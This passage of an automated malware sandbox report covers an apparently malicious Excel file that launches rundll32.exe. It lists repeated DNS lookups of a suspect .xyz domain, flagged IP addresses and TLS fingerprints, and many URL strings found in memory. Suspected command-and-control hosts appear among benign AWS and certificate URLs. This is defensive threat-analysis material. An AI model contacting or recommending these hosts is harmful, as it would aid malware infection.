Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe DNS query: tvorartificialnature.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 50.87.146.86 50.87.146.86
Source: Joe Sandbox View IP Address: 199.79.62.99 199.79.62.99
Source: Joe Sandbox View IP Address: 192.185.214.87 192.185.214.87
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95DC83A0.png
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000003.2357799875.00000000003A8000.00000004.00000001.sdmp String found in binary or memory: /www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: metaflip.io
Source: rundll32.exe, 00000006.00000003.2173075122.0000000000351000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: rundll32.exe, 00000006.00000003.2173075122.0000000000351000.00000004.00000001.sdmp String found in binary or memory: http://crt.comod
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2498007471.0000000001E77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171708661.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179647418.0000000001CB7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2498007471.0000000001E77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171708661.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179647418.0000000001CB7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2173075122.0000000000351000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2498601207.0000000002B60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2498673488.0000000002CE0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2498007471.0000000001E77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171708661.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179647418.0000000001CB7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000003.2218917398.0000000000374000.00000004.00000001.sdmp String found in binary or memory: http://tvorartificialnature.xyz/
Source: rundll32.exe, 00000006.00000003.2187638501.000000000037B000.00000004.00000001.sdmp String found in binary or memory: http://tvorartificialnature.xyz/vorarti
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://usaaforced.fun/j
Source: rundll32.exe, 00000003.00000002.2498007471.0000000001E77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171708661.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179647418.0000000001CB7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2498601207.0000000002B60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2498673488.0000000002CE0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2498007471.0000000001E77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171708661.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179647418.0000000001CB7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2170889443.0000000000306000.00000004.00000001.sdmp String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://a0.aws
Source: rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.46/js
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.67
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/directories
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-head.js
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/librastandardlib
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.108/plc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/target/1.0.113/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: https://amazon.com/
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105903407.0000000000332000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/j
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/
